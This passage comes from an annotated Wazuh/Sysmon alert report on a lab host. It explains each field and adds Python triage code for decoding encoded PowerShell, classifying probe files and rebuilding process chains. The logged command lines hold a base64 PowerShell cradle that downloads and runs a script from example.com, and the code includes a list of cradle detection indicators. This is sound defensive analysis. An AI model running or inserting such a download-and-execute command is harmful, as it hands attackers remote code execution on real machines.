Account the parent ran as; same account, so no privilege change across this hop.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.
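Decoding the -EncodedCommand from the command line above, as an added example (not SOCscribe's or Wazuh's code). The command line is copied from data.win.eventdata.commandLine; the indicator list, the URL pattern and the helper names are this example's own choices.

```python
"""Decode a PowerShell -EncodedCommand argument and flag download-cradle
indicators. Added triage example; not SOCscribe or Wazuh code."""
import base64
import re
from typing import Optional

# Copied from data.win.eventdata.commandLine of the Process Create event above.
SAMPLE_COMMANDLINE = (
    '"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    '"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    "-NoLogo -NoProfile -EncodedCommand "
    "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4A"
    "RABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwA"
    "ZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA"
)

# Substrings that, in a decoded script, mark a download-and-execute cradle.
# This list is the example's own choice, not a Wazuh list.
CRADLE_INDICATORS = (
    "iex", "invoke-expression", "downloadstring", "downloadfile",
    "net.webclient", "invoke-webrequest", "frombase64string",
)

# powershell.exe accepts any unambiguous prefix of a parameter name, so
# -e, -ec, -enc and -EncodedCommand are all the same switch.
_SWITCH_RE = re.compile(r"(?i)(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]+)")


def extract_encoded_command(cmdline: str) -> Optional[str]:
    """Return the base64 blob passed to -EncodedCommand (any prefix form), or None."""
    for m in _SWITCH_RE.finditer(cmdline):
        flag = m.group(1).lower()
        if flag == "ec" or "encodedcommand".startswith(flag):
            return m.group(2)
    return None


def decode_encoded_command(b64: str) -> str:
    """-EncodedCommand is base64 over UTF-16LE text, not UTF-8; pad if needed."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    return raw.decode("utf-16-le")


def encode_command(script: str) -> str:
    """Inverse of decode_encoded_command; useful for building test cases."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def triage(cmdline: str) -> dict:
    """Decode the command line and report cradle indicators and embedded URLs."""
    b64 = extract_encoded_command(cmdline)
    if b64 is None:
        return {"encoded": False, "script": None, "indicators": [], "urls": []}
    script = decode_encoded_command(b64)
    low = script.lower()
    return {
        "encoded": True,
        "script": script,
        "indicators": [i for i in CRADLE_INDICATORS if i in low],
        "urls": re.findall(r"https?://[^\s'\"()]+", script),
    }


if __name__ == "__main__":
    print(triage(SAMPLE_COMMANDLINE))
```

The decoded script for this alert is IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'): fetch text from the URL and evaluate it in memory, so nothing of the second-stage script need ever touch disk. The URL is the indicator to take to proxy and DNS logs.
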

🎯 Recommended Actions

Decode the -EncodedCommand value (base64 of UTF-16LE text) before anything else. It decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'): a download-and-execute cradle that fetches a script from example.com/test and runs it in memory. Hunt for that URL in proxy and DNS logs and pull the served content if it is still reachable.
Walk the chain by GUID, not PID: this process (PID 6888) was started by PID 15520 with an identical command line, and it goes on to start PID 9052 the same way (next Process Create alert in this report). Three generations of powershell.exe with the same command line under the same LogonId 0x26584 point to a scripted or looping launcher, not a one-off command.
Pull Security Event 4624 for Logon ID 0x26584 to see how Attcker1 logged on (TerminalSessionId 1 means an interactive session), and check PowerShell Script Block Logging (Event 4104 in Microsoft-Windows-PowerShell/Operational) for the decoded script and whatever it downloaded.

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:35.674+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:35.674+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  94
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534375.1867923
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that emitted the event. Sysmon events carry their own schema (ProcessGuid, TargetFilename, CreationUtcTime), so do not read them with Security-log expectations.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of the provider above. It is the same on every host running Sysmon, which makes it a stable filter key.

data.win.system.eventID:  11
Event ID within the provider. For Sysmon: 11 = File Create, 1 = Process Create; these are not the Security-log numbers (4624, 4688).

data.win.system.version:  2
Schema version of this event type; newer Sysmon releases add fields to the same Event ID, so position-based parsers must check it.

data.win.system.level:  4
Windows event level; 4 = Informational. Sysmon logs everything at this level, so the severity here comes from the Wazuh rule, not from Windows.

data.win.system.task:  11
Windows task category number; Sysmon sets it equal to the Event ID.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:33.2686532Z
When the record was written to the event log; eventdata.utcTime (22:39:33.220) is when Sysmon saw the file created, and the Wazuh timestamp above is arrival at the manager. Order events by utcTime.

data.win.system.eventRecordID:  285352
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that wrote the log entry, i.e. the Sysmon service, not the process the event describes (that is eventdata.processId).

data.win.system.threadID:  4740
Thread inside the logging (Sysmon) process; ignore for triage.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log the record was read from. The Wazuh agent's eventchannel collector must subscribe to this channel for any Sysmon alert to exist.

data.win.system.computer:  Attacker
Host name stamped into the event. It should match agent.name; if it does not, the record was forwarded from another machine.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:39:33.220 ProcessGuid: {94294ddc-bda3-680a-a80b-000000000e00} ProcessId: 6888 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_em23qzpd.dwf.ps1 CreationUtcTime: 2025-04-24 22:39:33.220 User: Attacker\Attcker1"
Sysmon's rendered event text; the eventdata.* fields below are this string parsed into key/value pairs.

data.win.eventdata.utcTime:  2025-04-24 22:39:33.220
When Sysmon observed the file being created (UTC); 1.4 s after this PowerShell instance started (its Process Create shows utcTime 22:39:31.869).

data.win.eventdata.processGuid:  {94294ddc-bda3-680a-a80b-000000000e00}
Sysmon's per-process-instance GUID. It is the GUID of PID 6888 from the preceding Process Create alert, and the parentProcessGuid of PID 9052 in the next one.

data.win.eventdata.processId:  6888
Windows PID of the writing process; reused after exit, so join on the GUID.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the process that created the file: Windows PowerShell 5.1 itself.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_em23qzpd.dwf.ps1
Path of the file created. __PSScriptPolicyTest_<random>.ps1 in the user's Temp folder is PowerShell's start-up probe for AppLocker/WDAC script enforcement, written once per PowerShell launch; it is not the downloaded payload, which the cradle in the command line runs in memory.

data.win.eventdata.creationUtcTime:  2025-04-24 22:39:33.220
Creation timestamp of the file. Equal to utcTime, so the file is new rather than an overwritten existing one.

data.win.eventdata.user:  Attacker\\Attcker1
DOMAIN\user whose token the writing process ran under; the same local account as the Process Create events.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.
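A triage filter for this File Create pattern, added as an example; it is not part of SOCscribe or of the Wazuh ruleset. The first two events are built from the fields of the two File Create alerts on this page; the remaining two are constructed negatives. The label names are this example's own. It is kept deliberately narrow: only powershell.exe writing the exact __PSScriptPolicyTest_ name shape into a user's Temp folder is downgraded, and the same name from any other image is raised rather than lowered, because a file name that analysts have learned to ignore is exactly what a dropper would borrow.

```python
"""Classify Sysmon Event ID 11 (File Create) hits on PowerShell's start-up
policy-probe file. Added triage example; not SOCscribe or Wazuh code."""
import re

# PowerShell writes __PSScriptPolicyTest_<8 random>.<3 random>.ps1 into the
# user's Temp folder at every start-up to test AppLocker/WDAC script enforcement.
# Only that exact shape, in that folder, written by PowerShell itself, is benign.
_PROBE_RE = re.compile(
    r"(?i)^[a-z]:\\users\\[^\\]+\\appdata\\local\\temp\\"
    r"__psscriptpolicytest_[a-z0-9]{8}\.[a-z0-9]{3}\.ps1$"
)
_POWERSHELL_RE = re.compile(r"(?i)\\(powershell|pwsh)\.exe$")

# First two events: copied from the two File Create alerts on this page.
# Last two: constructed negatives (not from the host).
EVENTS = [
    {"processId": 15520, "image": r"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe",
     "targetFilename": r"C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_ulxacboz.arb.ps1",
     "utcTime": "2025-04-24 22:39:30.274", "creationUtcTime": "2025-04-24 22:39:30.274"},
    {"processId": 6888, "image": r"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe",
     "targetFilename": r"C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_em23qzpd.dwf.ps1",
     "utcTime": "2025-04-24 22:39:33.220", "creationUtcTime": "2025-04-24 22:39:33.220"},
    {"processId": 4242, "image": r"C:\Windows\System32\cmd.exe",  # constructed: right name, wrong writer
     "targetFilename": r"C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_aaaabbbb.ccc.ps1",
     "utcTime": "2025-04-24 22:40:00.000", "creationUtcTime": "2025-04-24 22:40:00.000"},
    {"processId": 6888, "image": r"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe",  # constructed
     "targetFilename": r"C:\Users\Attcker1\AppData\Local\Temp\update.exe",
     "utcTime": "2025-04-24 22:40:01.000", "creationUtcTime": "2025-04-24 22:39:00.000"},
]


def classify_filecreate(event: dict) -> dict:
    """Return a verdict label and triage notes for one File Create event."""
    image = event.get("image", "")
    target = event.get("targetFilename", "")
    notes = []
    if _PROBE_RE.match(target):
        if _POWERSHELL_RE.search(image):
            label = "benign-policy-probe"
            notes.append("PowerShell start-up probe; pivot to the Process Create of this PID instead")
        else:
            label = "suspicious-probe-mimic"
            notes.append("probe file name written by a non-PowerShell image")
    else:
        label = "review"
    # A CreationUtcTime earlier than UtcTime means an existing file was overwritten.
    if event.get("creationUtcTime", "") < event.get("utcTime", ""):
        notes.append("existing file overwritten (creation time predates the event)")
    return {"label": label, "processId": event.get("processId"), "notes": notes}


def classify_all(events=EVENTS):
    """Classify a batch of File Create events in order."""
    return [classify_filecreate(e) for e in events]


if __name__ == "__main__":
    for verdict in classify_all():
        print(verdict)
```

In production this logic belongs in a low-level child rule of the firing rule, keyed on the same two fields (image and targetFilename), so the Process Create alert for the same processGuid carries the weight instead.
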

🎯 Recommended Actions

Same artefact as the earlier File Create alert in this report: __PSScriptPolicyTest_em23qzpd.dwf.ps1 is the start-up probe written by the PowerShell instance PID 6888 (processGuid {94294ddc-bda3-680a-a80b-000000000e00}). On its own it is noise, and a rule level of 15 overstates it; the Process Create alert for the same GUID, with its encoded download cradle, is the one to score.
Keep any suppression narrow: only powershell.exe writing exactly this name pattern into %LOCALAPPDATA%\Temp. The same file name from any other image should stay at full level.

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:39.387+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:39.387+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  91
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534379.1870688
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that emitted the event. Sysmon events carry their own schema (ProcessGuid, Hashes, Parent* fields), so do not read them with Security-log (4688) expectations.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
GUID of the provider above. It is the same on every host running Sysmon, which makes it a stable filter key.

data.win.system.eventID:  1
Event ID within the provider. For Sysmon: 1 = Process Create, 11 = File Create; these are not the Security-log numbers (4624, 4688).

data.win.system.version:  5
Schema version of this event type. Newer Sysmon releases add fields to the same Event ID (this version carries ParentUser), so position-based parsers must check it.

data.win.system.level:  4
Windows event level; 4 = Informational. Sysmon logs everything at this level, so the severity here comes from the Wazuh rule, not from Windows.

data.win.system.task:  1
Windows task category number; Sysmon sets it equal to the Event ID.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:36.5833716Z
When the record was written to the event log. It trails eventdata.utcTime (22:39:34.873, when Sysmon saw the process start) by well over a second here, and the Wazuh timestamp above (arrival at the manager) is later still; order events by utcTime.

data.win.system.eventRecordID:  285381
Incremental log record number – handy for timeline order. Thirty records after the previous Process Create (285351), so the host was logging busily in those three seconds.

data.win.system.processID:  3712
PID of the process that wrote the log entry, i.e. the Sysmon service, not the process the event describes (that is eventdata.processId).

data.win.system.threadID:  4740
Thread inside the logging (Sysmon) process; ignore for triage.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log the record was read from. The Wazuh agent's eventchannel collector must subscribe to this channel for any Sysmon alert to exist.

data.win.system.computer:  Attacker
Host name stamped into the event. It should match agent.name; if it does not, the record was forwarded from another machine.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:39:34.873 ProcessGuid: {94294ddc-bda6-680a-ab0b-000000000e00} ProcessId: 9052 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bda3-680a-a80b-000000000e00} ParentProcessId: 6888 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
Sysmon's rendered event text; the eventdata.* fields below are this string parsed into key/value pairs. The CommandLine is the same doubled powershell.exe invocation with the same -EncodedCommand as the two generations before it.

data.win.eventdata.utcTime:  2025-04-24 22:39:34.873
When Sysmon observed the process start (UTC): 3.0 s after its parent (PID 6888, 22:39:31.869). This is the authoritative time for ordering.

data.win.eventdata.processGuid:  {94294ddc-bda6-680a-ab0b-000000000e00}
Sysmon's per-process-instance GUID for PID 9052. Search on it to find this process's own File Create and any further Process Create it emits; the chain has not necessarily stopped here.

data.win.eventdata.processId:  9052
Windows PID. Reused after the process exits, so join on the GUID, not on this.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the executable that started: Windows PowerShell 5.1 from System32.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
Version resource of the image (build 26100 = Windows 11 24H2). Use it to pick the right known-good copy when comparing the hash below.

data.win.eventdata.description:  Windows PowerShell
String from the PE version resource. Trivial to forge in a custom binary; corroborate with the hash and a signature check rather than trusting it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product string from the PE version resource; same caveat as description.

data.win.eventdata.company:  Microsoft Corporation
Company string from the PE version resource; same caveat as description.

data.win.eventdata.originalFileName:  PowerShell.EXE
File name compiled into the version resource. Compare with the basename of image: a mismatch means the binary was renamed on disk, a common evasion. Here both are powershell.exe.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Full command line, identical to the two previous generations. The -EncodedCommand value (base64 over UTF-16LE text) decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), a download-and-execute cradle; the first argument is again a powershell.exe path, so this instance is set up to reproduce itself once more.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
Working directory of the new process (the user's profile root); relative paths in the decoded script resolve from here.

data.win.eventdata.user:  Attacker\\Attcker1
Account the process runs as: local account Attcker1 on host Attacker, unchanged across the chain.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
Sysmon's GUID for the logon session the process belongs to; the same session as PID 6888 and PID 15520.

data.win.eventdata.logonId:  0x26584
Windows logon session ID (LUID). Match it against the Logon ID in Security Event 4624 to see how and when Attcker1 authenticated; all three generations share this value, so one logon produced the whole chain.

data.win.eventdata.terminalSessionId:  1
Windows session number. Session 0 hosts services; 1 here is an interactive desktop session (console or RDP).

data.win.eventdata.integrityLevel:  Medium
Token integrity level. Medium = standard, non-elevated user; no elevation has happened anywhere in the chain so far.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
Hash of the image file in the algorithms Sysmon is configured for (SHA256 only here). Identical to the hash on PID 6888's event, so the same file on disk is executing; compare it with a trusted copy of file version 10.0.26100.3323 before ruling out tampering.

data.win.eventdata.parentProcessGuid:  {94294ddc-bda3-680a-a80b-000000000e00}
GUID of the parent process: PID 6888, the subject of the previous Process Create alert, which was itself started by PID 15520.

data.win.eventdata.parentProcessId:  6888
PID of the parent; subject to reuse, so rely on parentProcessGuid.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Executable of the parent: also Windows PowerShell.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Parent's command line, byte-for-byte identical to this process's own, encoded cradle included.

data.win.eventdata.parentUser:  Attacker\\Attcker1
Account the parent ran as; same account, so no privilege change across this hop.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.
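Rebuilding the process chain behind this alert and the previous Process Create alert, as an added example (not SOCscribe or Wazuh code). The two events are reconstructed from the eventdata fields on this page; PID 15520, the root, has no Process Create event in this section, so the walk takes its details from the child's Parent* fields and stops there. Function names are this example's own.

```python
"""Rebuild a Sysmon process chain from ProcessGuid / ParentProcessGuid links
and measure how many generations re-spawn the same command. Added example;
not SOCscribe or Wazuh code."""
import ntpath

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENC = (
    "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4A"
    "RABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwA"
    "ZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA"
)
CMD = (
    r'"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" '
    "-NoLogo -NoProfile -EncodedCommand " + ENC
)

# Reconstructed from the two Process Create alerts on this page.
EVENTS = [
    {"utcTime": "2025-04-24 22:39:31.869", "processGuid": "{94294ddc-bda3-680a-a80b-000000000e00}",
     "processId": 6888, "image": PS, "commandLine": CMD, "logonId": "0x26584",
     "parentProcessGuid": "{94294ddc-bda0-680a-a60b-000000000e00}", "parentProcessId": 15520,
     "parentImage": PS, "parentCommandLine": CMD},
    {"utcTime": "2025-04-24 22:39:34.873", "processGuid": "{94294ddc-bda6-680a-ab0b-000000000e00}",
     "processId": 9052, "image": PS, "commandLine": CMD, "logonId": "0x26584",
     "parentProcessGuid": "{94294ddc-bda3-680a-a80b-000000000e00}", "parentProcessId": 6888,
     "parentImage": PS, "parentCommandLine": CMD},
]


def build_index(events):
    """ProcessGuid -> Process Create event. Join on GUIDs, not PIDs: Windows
    reuses PIDs, Sysmon GUIDs are unique per process instance."""
    return {e["processGuid"]: e for e in events}


def ancestry(guid, index):
    """Walk parent links from guid upward. Each hop is (guid, pid, image, commandLine).
    When a parent has no Process Create event of its own (PID 15520 here), its
    details come from the child's Parent* fields and the walk stops there."""
    chain = []
    seen = set()
    while guid in index and guid not in seen:
        seen.add(guid)
        e = index[guid]
        chain.append((guid, e["processId"], e["image"], e["commandLine"]))
        parent = e["parentProcessGuid"]
        if parent not in index:
            chain.append((parent, e["parentProcessId"], e["parentImage"], e["parentCommandLine"]))
        guid = parent
    return chain


def self_spawn_depth(chain):
    """Count consecutive hops where child and parent are the same executable
    with byte-identical command lines. Depth >= 2 is a looping launcher, not
    a user typing the same thing twice."""
    depth = 0
    for (_, _, img, cmd), (_, _, pimg, pcmd) in zip(chain, chain[1:]):
        if ntpath.basename(img).lower() == ntpath.basename(pimg).lower() and cmd == pcmd:
            depth += 1
        else:
            break
    return depth


def root_of(chain):
    """Oldest process in the chain: the one to terminate and to pivot on next."""
    return chain[-1] if chain else None


if __name__ == "__main__":
    idx = build_index(EVENTS)
    chain = ancestry("{94294ddc-bda6-680a-ab0b-000000000e00}", idx)
    print([pid for _, pid, _, _ in chain], "self-spawn depth", self_spawn_depth(chain))
```

For this page the walk from PID 9052 yields 9052 -> 6888 -> 15520 with a self-spawn depth of 2, and the root GUID it returns is the one to search for next: the Process Create of PID 15520 names whatever started the loop.
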

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:39.393+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:39.393+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  95
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534379.1878751
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

